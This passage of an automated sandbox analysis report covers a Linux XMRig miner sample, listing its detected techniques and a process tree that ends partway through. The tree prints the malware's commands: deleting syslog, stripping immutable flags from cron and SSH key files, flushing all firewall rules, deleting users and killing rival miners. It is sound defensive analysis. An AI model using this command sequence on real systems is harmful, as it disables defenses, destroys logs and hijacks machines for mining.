xmrig_linux | f73852da62dd7d56a74a82144a5cfd694201fca36a7b86888f1a8f069f6b3492

Analysis

max time kernel
149s
max time network
149s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
04-07-2024 09:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

257c6ea365b6ca33dd34c90584ed88bb_JaffaCakes118
Size

30KB
MD5

257c6ea365b6ca33dd34c90584ed88bb
SHA1

655704ef149ea4a9667089442209854460c4c78f
SHA256

f73852da62dd7d56a74a82144a5cfd694201fca36a7b86888f1a8f069f6b3492
SHA512

c2a38716ee954f0dd6bc143168950a5f2c8ea180bad6a968f86c837bd7c25487de8c427c5e086f433f09ca805d9bb8deb9e1f000f610748999e2c62d3a095afd
SSDEEP

384:p7pQBDf6jlpTWg3vMGQiirhHwMyGj4CC9vEKMvU/4Qdre21jT58vKpG2Y0orcfKe:p78zQ5VFNcDAFLcIwgnoYq0xFBVZHtln

Score

10^/10

xmrig_linux evasion miner rootkit

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig_linux

Deletes system logs 1 TTPs 1 IoCs

Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.

evasion

Indicator Removal

T1070

Processes:

description	ioc	Process
File deleted	/var/log/syslog	rm

Flushes firewall rules 3 IoCs

Flushes/ disables firewall rules inside the Linux kernel.

Processes:

ufwiptables

pid	Process
1516	ufw
1691	iptables
3059

Loads a kernel module 1 IoCs

Loads a Linux kernel module, potentially to achieve persistence

rootkit

Processes:

modprobe

ioc	pid	Process
/lib/modules/4.15.0-213-generic/kernel/net/ipv6/netfilter/ip6_tables.ko	1520	modprobe

Attempts to change immutable files 64 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

Processes:

ip6tablesxargsxargsxargschattrxargsxargsip6tablesxargsxargsiptablesxargsip6tablesxargsxargsiptablesxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsip6tablesxargsxargsxargsxargsxargsxargsxargsip6tablesxargsxargsxargsxargsxargschattrxargsxargs

pid	Process
1616	ip6tables
1728	xargs
2048	xargs
2495	xargs
3028
1514	chattr
2614
2706
2407	xargs
2307	xargs
2656
1617	ip6tables
1943	xargs
2176	xargs
2585
2988
1552	iptables
2648
2670
1752	xargs
1651	ip6tables
1998	xargs
2275	xargs
2698
1569	iptables
1968	xargs
2221	xargs
2618
2678
1917	xargs
2028	xargs
2171	xargs
2395	xargs
2413	xargs
3012
2013	xargs
1794	xargs
1860	xargs
1948	xargs
1978	xargs
2018	xargs
3004
3016
1652	ip6tables
1849	xargs
1902	xargs
1973	xargs
2088	xargs
2332	xargs
2348	xargs
2360	xargs
1622	ip6tables
2366	xargs
2710
2302	xargs
1746	xargs
1832	xargs
2475	xargs
2622
2634
2636
1699	chattr
1887	xargs
2098	xargs

Disables AppArmor 28 IoCs

Disables AppArmor security module.

Processes:

pid	Process
3038
3058
3063
3070
3070
3038
3038
3063
3063
3070
3038
3058
3070
3058
3063
3038
3063
3073
3075
3038
3051
3063
3070
3086
3058
3058
3058
3070

Disables SELinux 1 IoCs

Disables SELinux security module.

Processes:

pid	Process
3037

Enumerates running processes
Discovers information about currently running processes on the system

Changes its process name 1 IoCs

Processes:

description	ioc	pid
Changes the process name, possibly in an attempt to hide itself	(sysv-install)	3055

Reads CPU attributes 1 TTPs 64 IoCs

System Information Discovery

T1082

Processes:

pspspspskillpspspspspspspspspspspspspspspspspspspspspspspsps

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps

Enumerates kernel/hardware configuration 1 TTPs 2 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

Processes:

modprobe

description	ioc	Process
File opened for reading	/sys/module/ip6_tables/initstate	modprobe
File opened for reading	/sys/module/x_tables/initstate	modprobe

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

Processes:

pspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspsps

description	ioc	Process
File opened for reading	/proc/26/stat	ps
File opened for reading	/proc/98/cmdline
File opened for reading	/proc/1098/status	ps
File opened for reading	/proc/36/stat	ps
File opened for reading	/proc/1507/status
File opened for reading	/proc/686/status	ps
File opened for reading	/proc/25/stat	ps
File opened for reading	/proc/1085/cmdline	ps
File opened for reading	/proc/16/status
File opened for reading	/proc/740/stat	ps
File opened for reading	/proc/162/status	ps
File opened for reading	/proc/460/cmdline
File opened for reading	/proc/35/cmdline
File opened for reading	/proc/1170/cmdline
File opened for reading	/proc/500/cmdline	ps
File opened for reading	/proc/1065/cmdline	ps
File opened for reading	/proc/29/status	ps
File opened for reading	/proc/500/status
File opened for reading	/proc/522/status	ps
File opened for reading	/proc/271/status
File opened for reading	/proc/1864/stat	ps
File opened for reading	/proc/8/status	ps
File opened for reading	/proc/2476/stat	ps
File opened for reading	/proc/167/status
File opened for reading	/proc/167/cmdline
File opened for reading	/proc/26/status	ps
File opened for reading	/proc/161/status	ps
File opened for reading	/proc/666/stat	ps
File opened for reading	/proc/1164/cmdline	ps
File opened for reading	/proc/461/stat	ps
File opened for reading	/proc/1171/cmdline	ps
File opened for reading	/proc/699/cmdline	ps
File opened for reading	/proc/1/cmdline
File opened for reading	/proc/1507/cmdline
File opened for reading	/proc/1232/cmdline
File opened for reading	/proc/32/cmdline
File opened for reading	/proc/7/cmdline	ps
File opened for reading	/proc/166/status
File opened for reading	/proc/1098/status
File opened for reading	/proc/21/status	ps
File opened for reading	/proc/1143/stat	ps
File opened for reading	/proc/1197/cmdline	ps
File opened for reading	/proc/418/cmdline	ps
File opened for reading	/proc/30/stat	ps
File opened for reading	/proc/448/cmdline	ps
File opened for reading	/proc/1350/cmdline
File opened for reading	/proc/23/status
File opened for reading	/proc/115/cmdline	ps
File opened for reading	/proc/14/status
File opened for reading	/proc/970/cmdline
File opened for reading	/proc/24/status	ps
File opened for reading	/proc/1506/cmdline	ps
File opened for reading	/proc/1/cmdline	ps
File opened for reading	/proc/1860/status	ps
File opened for reading	/proc/1281/status	ps
File opened for reading	/proc/85/cmdline	ps
File opened for reading	/proc/321/stat	ps
File opened for reading	/proc/1531/cmdline
File opened for reading	/proc/731/status
File opened for reading	/proc/740/cmdline
File opened for reading	/proc/1382/cmdline
File opened for reading	/proc/1510/status
File opened for reading	/proc/416/status
File opened for reading	/proc/1164/cmdline

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

Processes:

257c6ea365b6ca33dd34c90584ed88bb_JaffaCakes118

description	ioc	Process
File opened for modification	/tmp/log_rot	257c6ea365b6ca33dd34c90584ed88bb_JaffaCakes118

/tmp/257c6ea365b6ca33dd34c90584ed88bb_JaffaCakes118
/tmp/257c6ea365b6ca33dd34c90584ed88bb_JaffaCakes118
1⤵
- Writes file to tmp directory
PID:1510
- /bin/rm
  rm -rf /var/log/syslog
  2⤵
  - Deletes system logs
  PID:1511
- /usr/bin/chattr
  chattr -iua /tmp/
  2⤵
  PID:1512
- /usr/bin/chattr
  chattr -iua /var/tmp/
  2⤵
  PID:1513
- /usr/bin/chattr
  chattr -R -i /var/spool/cron
  2⤵
  - Attempts to change immutable files
  PID:1514
- /usr/bin/chattr
  chattr -i /etc/crontab
  2⤵
  PID:1515
- /usr/sbin/ufw
  ufw disable
  2⤵
  - Flushes firewall rules
  PID:1516
- - /sbin/iptables
    /sbin/iptables -V
    3⤵
    PID:1517
- - /lib/ufw/ufw-init
    /lib/ufw/ufw-init force-stop
    3⤵
    PID:1518
  - - /sbin/ip6tables
      ip6tables -L INPUT -n
      4⤵
      PID:1519
    - - /sbin/modprobe
        
        /sbin/modprobe ip6_tables
        5⤵
        Loads a kernel module
        Enumerates kernel/hardware configuration
        
        PID:1520
  - - /sbin/iptables
      iptables -F ufw-logging-deny
      4⤵
      PID:1524
  - - /sbin/iptables
      iptables -F ufw-logging-allow
      4⤵
      PID:1527
  - - /sbin/iptables
      iptables -F ufw-not-local
      4⤵
      PID:1528
  - - /sbin/iptables
      iptables -F ufw-user-logging-input
      4⤵
      PID:1529
  - - /sbin/iptables
      iptables -F ufw-user-limit-accept
      4⤵
      PID:1530
  - - /sbin/iptables
      iptables -F ufw-user-limit
      4⤵
      PID:1534
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-input
      4⤵
      PID:1535
  - - /sbin/iptables
      iptables -F ufw-reject-input
      4⤵
      PID:1536
  - - /sbin/iptables
      iptables -F ufw-after-logging-input
      4⤵
      PID:1537
  - - /sbin/iptables
      iptables -F ufw-after-input
      4⤵
      PID:1538
  - - /sbin/iptables
      iptables -F ufw-user-input
      4⤵
      PID:1539
  - - /sbin/iptables
      iptables -F ufw-before-input
      4⤵
      PID:1540
  - - /sbin/iptables
      iptables -F ufw-before-logging-input
      4⤵
      PID:1541
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-forward
      4⤵
      PID:1542
  - - /sbin/iptables
      iptables -F ufw-reject-forward
      4⤵
      PID:1543
  - - /sbin/iptables
      iptables -F ufw-after-logging-forward
      4⤵
      PID:1544
  - - /sbin/iptables
      iptables -F ufw-after-forward
      4⤵
      PID:1545
  - - /sbin/iptables
      iptables -F ufw-user-logging-forward
      4⤵
      PID:1546
  - - /sbin/iptables
      iptables -F ufw-user-forward
      4⤵
      PID:1547
  - - /sbin/iptables
      iptables -F ufw-before-forward
      4⤵
      PID:1548
  - - /sbin/iptables
      iptables -F ufw-before-logging-forward
      4⤵
      PID:1549
  - - /sbin/iptables
      iptables -F ufw-track-forward
      4⤵
      PID:1550
  - - /sbin/iptables
      iptables -F ufw-track-output
      4⤵
      PID:1551
  - - /sbin/iptables
      iptables -F ufw-track-input
      4⤵
      Attempts to change immutable files
      PID:1552
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-output
      4⤵
      PID:1553
  - - /sbin/iptables
      iptables -F ufw-reject-output
      4⤵
      PID:1554
  - - /sbin/iptables
      iptables -F ufw-after-logging-output
      4⤵
      PID:1555
  - - /sbin/iptables
      iptables -F ufw-after-output
      4⤵
      PID:1556
  - - /sbin/iptables
      iptables -F ufw-user-logging-output
      4⤵
      PID:1557
  - - /sbin/iptables
      iptables -F ufw-user-output
      4⤵
      PID:1558
  - - /sbin/iptables
      iptables -F ufw-before-output
      4⤵
      PID:1559
  - - /sbin/iptables
      iptables -F ufw-before-logging-output
      4⤵
      PID:1560
  - - /sbin/iptables
      iptables -Z ufw-logging-deny
      4⤵
      PID:1561
  - - /sbin/iptables
      iptables -Z ufw-logging-allow
      4⤵
      PID:1562
  - - /sbin/iptables
      iptables -Z ufw-not-local
      4⤵
      PID:1563
  - - /sbin/iptables
      iptables -Z ufw-user-logging-input
      4⤵
      PID:1564
  - - /sbin/iptables
      iptables -Z ufw-user-limit-accept
      4⤵
      PID:1565
  - - /sbin/iptables
      iptables -Z ufw-user-limit
      4⤵
      PID:1566
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-input
      4⤵
      PID:1567
  - - /sbin/iptables
      iptables -Z ufw-reject-input
      4⤵
      PID:1568
  - - /sbin/iptables
      iptables -Z ufw-after-logging-input
      4⤵
      Attempts to change immutable files
      PID:1569
  - - /sbin/iptables
      iptables -Z ufw-after-input
      4⤵
      PID:1570
  - - /sbin/iptables
      iptables -Z ufw-user-input
      4⤵
      PID:1571
  - - /sbin/iptables
      iptables -Z ufw-before-input
      4⤵
      PID:1572
  - - /sbin/iptables
      iptables -Z ufw-before-logging-input
      4⤵
      PID:1573
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-forward
      4⤵
      PID:1574
  - - /sbin/iptables
      iptables -Z ufw-reject-forward
      4⤵
      PID:1575
  - - /sbin/iptables
      iptables -Z ufw-after-logging-forward
      4⤵
      PID:1576
  - - /sbin/iptables
      iptables -Z ufw-after-forward
      4⤵
      PID:1577
  - - /sbin/iptables
      iptables -Z ufw-user-logging-forward
      4⤵
      PID:1578
  - - /sbin/iptables
      iptables -Z ufw-user-forward
      4⤵
      PID:1579
  - - /sbin/iptables
      iptables -Z ufw-before-forward
      4⤵
      PID:1580
  - - /sbin/iptables
      iptables -Z ufw-before-logging-forward
      4⤵
      PID:1581
  - - /sbin/iptables
      iptables -Z ufw-track-forward
      4⤵
      PID:1582
  - - /sbin/iptables
      iptables -Z ufw-track-output
      4⤵
      PID:1583
  - - /sbin/iptables
      iptables -Z ufw-track-input
      4⤵
      PID:1584
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-output
      4⤵
      PID:1585
  - - /sbin/iptables
      iptables -Z ufw-reject-output
      4⤵
      PID:1586
  - - /sbin/iptables
      iptables -Z ufw-after-logging-output
      4⤵
      PID:1587
  - - /sbin/iptables
      iptables -Z ufw-after-output
      4⤵
      PID:1588
  - - /sbin/iptables
      iptables -Z ufw-user-logging-output
      4⤵
      PID:1589
  - - /sbin/iptables
      iptables -Z ufw-user-output
      4⤵
      PID:1590
  - - /sbin/iptables
      iptables -Z ufw-before-output
      4⤵
      PID:1591
  - - /sbin/iptables
      iptables -Z ufw-before-logging-output
      4⤵
      PID:1592
  - - /sbin/iptables
      iptables -X ufw-logging-deny
      4⤵
      PID:1593
  - - /sbin/iptables
      iptables -X ufw-logging-allow
      4⤵
      PID:1594
  - - /sbin/iptables
      iptables -X ufw-not-local
      4⤵
      PID:1595
  - - /sbin/iptables
      iptables -X ufw-user-logging-input
      4⤵
      PID:1596
  - - /sbin/iptables
      iptables -X ufw-user-logging-output
      4⤵
      PID:1597
  - - /sbin/iptables
      iptables -X ufw-user-logging-forward
      4⤵
      PID:1598
  - - /sbin/iptables
      iptables -X ufw-user-limit-accept
      4⤵
      PID:1599
  - - /sbin/iptables
      iptables -X ufw-user-limit
      4⤵
      PID:1600
  - - /sbin/iptables
      iptables -X ufw-user-input
      4⤵
      PID:1601
  - - /sbin/iptables
      iptables -X ufw-user-forward
      4⤵
      PID:1602
  - - /sbin/iptables
      iptables -X ufw-user-output
      4⤵
      PID:1603
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-input
      4⤵
      PID:1604
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-output
      4⤵
      PID:1605
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-forward
      4⤵
      PID:1606
  - - /sbin/iptables
      iptables -P INPUT ACCEPT
      4⤵
      PID:1607
  - - /sbin/iptables
      iptables -P OUTPUT ACCEPT
      4⤵
      PID:1608
  - - /sbin/iptables
      iptables -P FORWARD ACCEPT
      4⤵
      PID:1609
  - - /sbin/ip6tables
      ip6tables -F ufw6-logging-deny
      4⤵
      PID:1610
  - - /sbin/ip6tables
      ip6tables -F ufw6-logging-allow
      4⤵
      PID:1611
  - - /sbin/ip6tables
      ip6tables -F ufw6-not-local
      4⤵
      PID:1612
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-input
      4⤵
      PID:1613
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-limit-accept
      4⤵
      PID:1614
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-limit
      4⤵
      PID:1615
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-input
      4⤵
      Attempts to change immutable files
      PID:1616
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-input
      4⤵
      Attempts to change immutable files
      PID:1617
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-input
      4⤵
      PID:1618
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-input
      4⤵
      PID:1619
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-input
      4⤵
      PID:1620
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-input
      4⤵
      PID:1621
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-input
      4⤵
      Attempts to change immutable files
      PID:1622
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-forward
      4⤵
      PID:1623
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-forward
      4⤵
      PID:1624
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-forward
      4⤵
      PID:1625
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-forward
      4⤵
      PID:1626
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-forward
      4⤵
      PID:1627
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-forward
      4⤵
      PID:1628
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-forward
      4⤵
      PID:1629
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-forward
      4⤵
      PID:1630
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-forward
      4⤵
      PID:1631
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-output
      4⤵
      PID:1632
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-input
      4⤵
      PID:1633
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-output
      4⤵
      PID:1634
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-output
      4⤵
      PID:1635
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-output
      4⤵
      PID:1636
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-output
      4⤵
      PID:1637
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-output
      4⤵
      PID:1638
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-output
      4⤵
      PID:1639
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-output
      4⤵
      PID:1640
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-output
      4⤵
      PID:1641
  - - /sbin/ip6tables
      ip6tables -Z ufw6-logging-deny
      4⤵
      PID:1642
  - - /sbin/ip6tables
      ip6tables -Z ufw6-logging-allow
      4⤵
      PID:1643
  - - /sbin/ip6tables
      ip6tables -Z ufw6-not-local
      4⤵
      PID:1644
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-input
      4⤵
      PID:1645
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-limit-accept
      4⤵
      PID:1646
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-limit
      4⤵
      PID:1647
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-input
      4⤵
      PID:1648
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-input
      4⤵
      PID:1649
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-input
      4⤵
      PID:1650
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-input
      4⤵
      Attempts to change immutable files
      PID:1651
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-input
      4⤵
      Attempts to change immutable files
      PID:1652
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-input
      4⤵
      PID:1653
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-input
      4⤵
      PID:1654
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-forward
      4⤵
      PID:1655
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-forward
      4⤵
      PID:1656
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-forward
      4⤵
      PID:1657
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-forward
      4⤵
      PID:1658
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-forward
      4⤵
      PID:1659
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-forward
      4⤵
      PID:1660
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-forward
      4⤵
      PID:1661
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-forward
      4⤵
      PID:1662
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-forward
      4⤵
      PID:1663
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-output
      4⤵
      PID:1664
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-input
      4⤵
      PID:1665
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-output
      4⤵
      PID:1666
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-output
      4⤵
      PID:1667
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-output
      4⤵
      PID:1668
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-output
      4⤵
      PID:1669
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-output
      4⤵
      PID:1670
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-output
      4⤵
      PID:1671
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-output
      4⤵
      PID:1672
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-output
      4⤵
      PID:1673
  - - /sbin/ip6tables
      ip6tables -X ufw6-logging-deny
      4⤵
      PID:1674
  - - /sbin/ip6tables
      ip6tables -X ufw6-logging-allow
      4⤵
      PID:1675
  - - /sbin/ip6tables
      ip6tables -X ufw6-not-local
      4⤵
      PID:1676
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-input
      4⤵
      PID:1677
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-output
      4⤵
      PID:1678
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-forward
      4⤵
      PID:1679
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-limit-accept
      4⤵
      PID:1680
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-limit
      4⤵
      PID:1681
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-input
      4⤵
      PID:1682
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-forward
      4⤵
      PID:1683
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-output
      4⤵
      PID:1684
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-input
      4⤵
      PID:1685
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-output
      4⤵
      PID:1686
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-forward
      4⤵
      PID:1687
  - - /sbin/ip6tables
      ip6tables -P INPUT ACCEPT
      4⤵
      PID:1688
  - - /sbin/ip6tables
      ip6tables -P OUTPUT ACCEPT
      4⤵
      PID:1689
  - - /sbin/ip6tables
      ip6tables -P FORWARD ACCEPT
      4⤵
      PID:1690
- /sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:1691
- /usr/bin/sudo
  sudo sysctl "kernel.nmi_watchdog=0"
  2⤵
  PID:1692
- /usr/sbin/userdel
  userdel akay
  2⤵
  PID:1696
- /usr/sbin/userdel
  userdel vfinder
  2⤵
  PID:1697
- /usr/bin/chattr
  chattr -iae /root/.ssh/
  2⤵
  PID:1698
- /usr/bin/chattr
  chattr -iae /root/.ssh/authorized_keys
  2⤵
  - Attempts to change immutable files
  PID:1699
- /bin/rm
  rm -rf "/tmp/addres*"
  2⤵
  PID:1700
- /bin/rm
  rm -rf "/tmp/walle*"
  2⤵
  PID:1701
- /bin/rm
  rm -rf /tmp/keys
  2⤵
  PID:1702
- /bin/grep
  grep -i "[a]liyun"
  2⤵
  PID:1704
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1703
- /bin/grep
  grep -i "[y]unjing"
  2⤵
  PID:1712
- /bin/ps
  ps aux
  2⤵
  PID:1711
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1717
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1716
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1715
- /bin/grep
  grep 185.71.65.238
  2⤵
  PID:1714
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1722
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1721
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1720
- /bin/grep
  grep 140.82.52.87
  2⤵
  PID:1719
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1728
- /bin/grep
  grep -v -
  2⤵
  PID:1727
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1726
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1725
- /bin/grep
  grep :143
  2⤵
  PID:1724
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1734
- /bin/grep
  grep -v -
  2⤵
  PID:1733
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1732
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1731
- /bin/grep
  grep :2222
  2⤵
  PID:1730
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1740
- /bin/grep
  grep -v -
  2⤵
  PID:1739
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1738
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1737
- /bin/grep
  grep :3333
  2⤵
  PID:1736
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1746
- /bin/grep
  grep -v -
  2⤵
  PID:1745
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1744
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1743
- /bin/grep
  grep :3389
  2⤵
  PID:1742
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1752
- /bin/grep
  grep -v -
  2⤵
  PID:1751
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1750
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1749
- /bin/grep
  grep :4444
  2⤵
  PID:1748
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1758
- /bin/grep
  grep -v -
  2⤵
  PID:1757
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1756
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1755
- /bin/grep
  grep :5555
  2⤵
  PID:1754
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1764
- /bin/grep
  grep -v -
  2⤵
  PID:1763
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1762
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1761
- /bin/grep
  grep :6666
  2⤵
  PID:1760
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1770
- /bin/grep
  grep -v -
  2⤵
  PID:1769
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1768
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1767
- /bin/grep
  grep :6665
  2⤵
  PID:1766
- /usr/bin/xargs
